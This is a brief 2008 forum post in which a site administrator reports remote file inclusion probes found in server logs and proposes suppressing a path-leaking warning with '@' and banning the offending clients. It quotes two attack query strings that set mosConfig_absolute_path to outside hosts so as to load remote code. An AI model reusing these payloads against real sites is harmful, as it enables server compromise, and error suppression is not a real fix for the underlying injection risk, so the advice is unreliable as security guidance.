security issue

hi,

while going through my logs, i found query_strings like
//index1.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&osConfig_aabsolute_path=http://www.nm.tm//mysqlbackups/tmp/ididon.txt???   

or
/?page=shop//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://apachi.100megsfree8.com/id.gif?

when a string containing REQUEST is submitted,
function import_request_variables ("CGP","");
in index.php shows a warning containing the absolute path.

this should be changed to
@import_request_variables ("CGP","");

and agents or ip's using these strings should be banned from the site

Last edited by uli (2008-10-04 13:15:37)